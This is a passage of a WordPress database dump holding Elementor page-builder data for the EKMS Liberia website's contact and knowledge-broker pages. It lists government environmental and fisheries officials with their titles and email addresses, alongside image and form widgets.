href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23040,3326,'_elementor_edit_mode','builder'),(23041,3326,'_elementor_template_type','wp-page'),(23042,3326,'_elementor_version','3.0.16'),(23043,3326,'_wp_page_template','default'),(23044,3326,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"